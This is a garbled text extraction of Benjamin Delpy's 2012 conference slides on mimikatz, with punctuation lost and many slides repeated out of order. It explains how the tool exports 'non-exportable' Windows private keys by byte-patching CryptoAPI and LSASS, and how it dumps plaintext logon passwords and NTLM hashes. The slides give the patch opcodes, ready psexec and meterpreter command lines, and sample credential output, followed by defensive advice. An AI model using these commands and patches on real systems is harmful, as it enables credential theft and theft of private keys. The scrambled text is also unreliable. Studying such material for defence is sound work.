07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
